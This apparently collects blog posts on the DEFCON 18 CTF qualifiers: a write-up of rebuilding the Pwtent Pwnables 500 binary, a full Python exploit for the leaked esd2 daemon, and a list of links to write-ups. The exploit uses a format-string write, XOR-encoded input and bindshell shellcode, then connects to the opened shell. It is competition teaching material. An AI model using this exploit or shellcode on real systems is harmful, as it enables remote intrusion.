DEFCON 18 Quals: Pwtent Pwnables 500 write up
May 28, 2010 by RD · Leave a Comment
This is a short write up since I’m a bit lazy. We didn’t solved it during the quals as it was too late (we exhausted and most of member including myself went to sleep so I only started looking into this in the morning of Monday. Didn’t have enough of time to finish it).
For pp500, ddtek gave us a pcap network dump of a remote exploit to a daemon on host 192.41.96.63, port 6913 and password to login is ‘antagonist’. Playing around with the daemon, I found out that ‘b’ command returns you back a block of 512 bytes from the binary.
Password: antagonist
? to see the menu
> ?
x - quit
d - donate entropy
r - report
b - /dev/hrnd
? - help
> b
Seed: 0
ELF 4�$4 (444�������&& l � ��/libexec/ld-elf.so.FreeBSDk5%20 .1!
"
/)(-*>
Seed value from 0 to 19 returned the same data, 20 returned different data, 21-39 same as 20, … So I wrote a script to extract out all the blocks from the binary with seed values 0, 20, 40, 60, 80, ….. After filtered out all the duplicated blocks, there were totally 21 unique blocks.
#!/usr/bin/env python
import sys
import socket
class humpty:
def __init__(self, host, port):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((host, port))
ret = self.s.recv(1024)
print ret
def login(self, passwd):
self.s.send(passwd + "\n")
ret = self.s.recv(1024)
print ret
def getdata(self, seed):
print seed
cmd = "b\n"
self.s.send(cmd)
ret = self.s.recv(1024)
print ret
ret = self.s.recv(1024)
print ret
self.s.send("%d\n" % seed)
ret = ret + self.s.recv(1024)
ret = ret
#print len(ret), repr(ret)
return ret[6:518]
def close(self):
self.s.close()
def log(file, data):
f = open(file, "w")
f.write(data)
f.close()
host = '192.41.96.63'
port = 6913
c = humpty(host, port)
a = raw_input("Enter to continue");
c.login("antagonist")
data = []
for i in range(0, 100):
data.append(c.getdata(20*i));
data = list(set(data))
print "Total %d unique blocks" % len(data)
for i in range(0, len(data)):
log("%d"%i, data[i])
print "Done"
c.close()
From the pcap dump session, we can find out that the size of humpty binary is 10392, which is 21 blocks of 512 bytes
-rwxr-x--- 1 root humpty 10392 May 22 19:06 humpty -rw-r----- 1 root humpty 21 May 22 19:01 key
The task now is to merge all the blocks in a the right order to rebuild the ELF binary. What I did was to get a sample freebsd binary which has similar size as humpty, then used `split -b512` to split it to 21 chunks of 512 bytes and then compared side by side with the 21 extracted blocks from ddtek’s pp500 server, merged it manually and used readelf to verify the merged binary. Here (or here) is the binary for pp500’s humpty.
After getting the binary, the rest of the tasks are easy since ddtek gave us out the exploit from the pcap dump. The exploit is similar to the exploit of esd2. FYI, esd2 is the original binary for pp500 which was leaked out via pp200 shell. After ddtek guys realized of this problem, they modified the esd2, changed password, strings, commands, read elf block functions, xor input, .. and named it humpty.
DEFCON 18 Quals: Pwtent Pwnables 500 esd2 exploit
May 28, 2010 by longld · Leave a Comment
CLGT did not solved this during the quals! Here is the exploit for the esd2 leaked from pp200 (thanks beist for sharing). More analysis & write up for the real pp500 will come later:
#!/usr/bin/env python
import socket
import struct
import telnetlib
import time
HOST = '192.168.56.101'
PORT = 8302
def xor_input(data):
static = "%5d | %5d\n" + "\x00"*4
out = ""
for i in range(len(data)):
out += chr(ord(static[i]) ^ ord(data[i]))
return out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# send password
s.send("sp3wn0w" + "\n")
# prepare the payload
# overwrite lseek@plt, original value = 0x08048ae2
target = 0x804a30c
# shellcode address = 0x0804a040 + 142 bytes (padding + fmt_string)
ret = 0x0804a0ce
# value to write into target
write_byte = 0xa0ce
# payload = target + padding(128 - 4) + 14 (fmt_string) + shellcode
padding = "A"*128
fmt_string = "%" + str(write_byte) + "u%24$hn"
fmt_string = xor_input(fmt_string)
# bindshell: port 5678
shellcode = "\x00\x29\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63\x7d\xa9\x09\x83\xeb\xfc\xe2\xf4\x09\x1c\xf1\x90\x31\x15\xb9\x0b\x75\x53\x20\xe8\x31\x3f\xfb\x4b\x31\x17\xb9\xc4\xe3\xe4\x3a\x58\x30\x2f\xc3\x61\x3b\xb0\x29\xb9\x09\xb0\x29\x5b\x30\x2f\x19\x17\xae\xfd\x3e\x63\x61\x24\xc3\x53\x3b\x2c\xfe\x58\xae\xfd\xe0\x70\x96\x2d\xc1\x26\x4c\x0e\xc1\x61\x4c\x1f\xc0\x67\xea\x9e\xf9\x5d\x30\x2e\x19\x32\xae\xfd\xa9\x09"
payload = struct.pack("<L", target) + padding[4:] + fmt_string + shellcode + "\n"
print "Sending payload...", repr(payload)
s.send("c\n" + str(len(payload)) +"\n")
s.send(payload)
# trigger the read_blob that calls lseek()
s.send("r\n" + "10\n")
print "Connecting to remote shell port 5678..."
time.sleep(4)
t = telnetlib.Telnet(HOST, 5678)
t.write("id\n\n")
t.interact()
t.close()
s.close()
DEFCON 18 Quals: writeups collection
May 25, 2010 by longld · 18 Comments
DEFCON 18 Quals is over and here are the writeups collection from teams, come back for latest updates.
(please inform me if you have write up for c500, pm500)
PURSUITS TRIVIAL
PT100: spiderman movie quote
- http://n.pentest.jp/?p=691 (Japanese)
- http://squidzrus.schleppingsquid.net/DC18-Qual-Walks/Defcon_CTF_Quals_2010_Writeups-PursuitsTrivial-100.html
PT200: VIM shell
- http://bernardodamele.blogspot.com/2010/05/defcon-18-ctf-quals-writeup-pursuit.html
- http://squidzrus.schleppingsquid.net/DC18-Qual-Walks/Defcon_CTF_Quals_2010_Writeups-PursuitsTrivial-200.html
- http://blog.stalkr.net/2010/05/defcon-18-ctf-quals-writeup-trivial-200.html
PT300: social networking
PT400: java game
- http://cvk.posterous.com/defcon-18-quals-pt400-walkthrough
- http://www.nth-dimension.org.uk/blog.php?id=85
- Defcon CTF Pursuits Trivial 400 server source and images
- pwning trivia 400 at defcon 18 quals (video)
PT500: audio remix
CRYPTO BADNESS
C100: alphabet cipher (Dvorak keyboard)
- http://www.nth-dimension.org.uk/blog.php?id=83
- http://forensic-proof.com/85 (Korean)
- http://squidzrus.schleppingsquid.net/DC18-Qual-Walks/Defcon_CTF_Quals_2010_Writeups-CryptoBadass-100.html
- http://n.pentest.jp/?p=728
C200: Enigma cipher
- http://forensic-proof.com/84 (Korean)
C300:
- http://n.pentest.jp/?p=713 (Japanese)
- http://forensic-proof.com/86 (Korean)
C400: RSA 768 bits crack
C500:
- n/a
PACKET MADNESS
PM100: yEnc madness (too hard for 100pts)
- http://ddtek.biz/mkyyank.pl (script written by ddtek’s m3rc to generate the PM100 challenge)
- http://stalkr.net/files/defcon/2010/quals/packet100/writeup.txt
PM200: EBCDIC shell
- http://scott.wolchok.org/ctf2010/pkt200.html
- http://bernardodamele.blogspot.com/2010/05/defcon-18-ctf-quals-writeup-packet.html
- http://squidzrus.schleppingsquid.net/DC18-Qual-Walks/Defcon_CTF_Quals_2010_Writeups-Packet%20Madness-200.html
- http://www.segmentationfault.fr/ctf/resume-dc18-ctf-quals/ (French)
- http://blog.stalkr.net/2010/05/defcon-18-ctf-quals-writeup-packet-200.html
PM300:
- http://nibbles.tuxfamily.org/?p=1389 (French)
PM400:
PM500:
- n/a
BINARY L33TNESS
B100: Linux x86 crackme
- http://ezbeat.tistory.com/234 (Korean)
- http://ddoogg.nayana.com/test/hahah/b100.txt
- http://n.pentest.jp/?p=719
B200: Haiku OS crackme
- http://solution-36.blogspot.com/2010/05/defcon-quals-binary-200-writeup.html
- http://n.pentest.jp/?p=734
- http://smokedchicken.org/2010/05/dc18-bin200-bin300.html (Russian)
B300: Linux x64 crackme
- http://scott.wolchok.org/ctf2010/b300.html (team n0tl33t)
- pwning binary 300 at defcon 18 quals (video)
- http://smokedchicken.org/2010/05/dc18-bin200-bin300.html (Russian)
B400: Linux x86 binary with embedded lightweight Java Virtual Machine (base on j2me_cldc reference code from Sun)
- http://blog.zynamics.com/2010/06/02/defcon-ctf-bin400-writeup/
- http://blog.oxff.net/2010/6/16/Defcon_CTF_%2318_Prequals%3A_bin400.html
B500: Solaris SPARC 9 x64 (find the DES key)
PWTENT PWNABLES
PP100: FreeBSD BOF exploit with stack cookie based on time
(wasted of time due to wrong server timezone!)PP200: python shell
- http://scott.wolchok.org/ctf2010/pp200.html
- pwning pwnable 200 at defcon 18 quals (video)
- http://bernardodamele.blogspot.com/2010/05/defcon-18-ctf-quals-writeup-pwtent.html
- http://www.rajatswarup.com/blog/2010/05/25/pwtent-pwnable-200-writeup-ctf-quals-2010/
PP300: FreeBSD exploit – heap overflow
- http://securityblackswan.blogspot.com/2010/05/lets-solve-this-challenge.html
- http://www.vxhell.org/~teach/defcon18/pwnables/pp300-writeup.txt
PP400: Mach-O PPC binary exploit (err .. it’s the same binary as last year pp400 challenge)
- Write up for pp400 by VedaGodz last year (they pulled out during the quals)
- http://adamrosenfield.com/blog/2010/05/26/ill-take-pwtent-pwnables-for-400-please-alex/
PP500: FreeBSD exploit recover from a packet dump
(err .. binary & key were leaked from PP200 shell to some teams)
- http://sploitlab.wordpress.com/2010/05/26/pwtent-pwnables-500-solution/ (unsolved)
- http://beist.org/esd2 (this is the binary lolz team taken from pwn200. after ddtek aware of this problem, they modified the code a bit)
- http://www.vnsecurity.net/2010/05/defcon-18-quals-pwtent-pwnables-500-exploit/ (exploit for esd2)
- http://www.vnsecurity.net/2010/05/defcon-18-quals-pwtent-pwnables-500-write-up/
FORENSICS
F100: hidden key in NTFS filesystem
- http://scott.wolchok.org/ctf2010/f100.html
- http://forensic-proof.com/87
- http://squidzrus.schleppingsquid.net/DC18-Qual-Walks/Defcon_CTF_Quals_2010_Writeups-Forensics-100.html
- http://n.pentest.jp/?p=739
- http://blog.stalkr.net/2010/05/defcon-18-ctf-quals-writeup-forensics.html
F200: PNG images analysis
- convert * -layers merge IMG_merged.png (one line solution)
- http://www.nth-dimension.org.uk/blog.php?id=84
- http://squidzrus.schleppingsquid.net/DC18-Qual-Walks/Defcon_CTF_Quals_2010_Writeups-Forensics-200.html
- http://www.bryceboe.com/2010/05/25/defcon-18-quals-forensics-200-write-up/
F300:
- http://forensic-proof.com/89 (Korean) – unsolved
- http://vserv3234.swisslink.ch/f300_writeup.txt (team Routards)
F400: Live OS image
F500:RAID image carving
- http://scott.wolchok.org/ctf2010/f500.html (team n0tl33t)
- http://forensic-proof.com/93 (Korean)
Misc Links


